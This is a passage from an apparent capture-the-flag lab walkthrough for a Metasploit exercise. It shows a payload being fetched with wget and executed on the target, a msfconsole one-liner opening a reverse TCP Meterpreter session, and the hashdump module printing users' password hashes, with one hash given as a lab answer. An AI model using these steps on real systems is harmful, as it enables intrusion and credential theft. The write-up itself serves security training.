10.10.55.92 - - [26/Sep/2021 10:37:52] "GET /rev_shell2.elf HTTP/1.1" 200 -
On Target ssh session :
1
2
3
4
5
6
7
8
9
10
root@ip-10-10-55-92:/tmp# wget http://10.10.196.135:9000/shell.elf
--2021-09-26 09:53:50-- http://10.10.196.135:9000/shell.elf
Connecting to 10.10.196.135:9000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207 [application/octet-stream]
Saving to: \u2018shell.elf\u2019
shell.elf 100%[==============================================>] 207 --.-KB/s in 0s
2021-09-26 09:53:50 (12.6 MB/s) - \u2018shell.elf\u2019 saved [207/207]
No Answer
Get a meterpreter session on the target machine.
On Kali machine :
1
root@ip-10-10-196-135:~/Desktop/msexploit# msfconsole -x "use exploit/multi/handler; set PAYLOAD linux/x86/meterpreter/reverse_tcp; set LHOST 10.10.196.135; set LPORT 7777; run"
on target machine :
1
2
root@ip-10-10-55-92:/tmp# chmod +x rev_shell2.elf
root@ip-10-10-55-92:/tmp# ./rev_shell2.elf
On KALI we got a meterpreter :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
[...]
=[ metasploit v5.0.101-dev ]
+ -- --=[ 2048 exploits - 1105 auxiliary - 344 post ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: You can use help to view all available commands
[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => linux/x86/meterpreter/reverse_tcp
LHOST => 10.10.196.135
LPORT => 7777
[*] Started reverse TCP handler on 10.10.196.135:7777
[*] Sending stage (980808 bytes) to 10.10.55.92
[*] Meterpreter session 1 opened (10.10.196.135:7777 -> 10.10.55.92:54228) at 2021-09-26 10:56:30 +0100
meterpreter >
No Answer
Use a post exploitation module to dump hashes of other users on the system.
We can use the linux/gather/hashdump module option find with the search option of metasploit :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
meterpreter >
Background session 1? [y/N] y
[-] Unknown command: y.
msf5 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/linux no-user @ ip-10-10-55-92 (uid=0, gid=0, euid=0, egid=0) @ ip-10-10-55-92.eu-w... 10.10.196.135:7777 -> 10.10.55.92:54228 (10.10.55.92)
msf5 exploit(multi/handler) > use linux/gather/hashdump
msf5 post(linux/gather/hashdump) > show options
Module options (post/linux/gather/hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
msf5 post(linux/gather/hashdump) > set session 1
session => 1
msf5 post(linux/gather/hashdump) > run
[+] murphy:$6$qK0Kt4UO$HuCrlOJGbBJb5Av9SL7rEzbxcz/KZYFkMwUqAE0ZMDpNRmOHhPHeI2JU3m9OBOS7lUKkKMADLxCBcywzIxl7b.:1001:1001::/home/murphy:/bin/sh
[+] claire:$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0:1002:1002::/home/claire:/bin/sh
[+] Unshadowed Password File: /root/.msf4/loot/20210926110318_default_10.10.55.92_linux.hashes_221290.txt
[*] Post module execution completed
No Answer
What is the other user’s password hash ?
Answer :
1
$6$Sy0NNIXw$SJ27WltHI89hwM5UxqVGiXidj94QFRm2Ynp9p9kxgVbjrmtMez9EqXoDWtcQd8rf0tjc77hBFbWxjGmQCTbep0
TASK 7 : Summary
No answer needed.
No Answer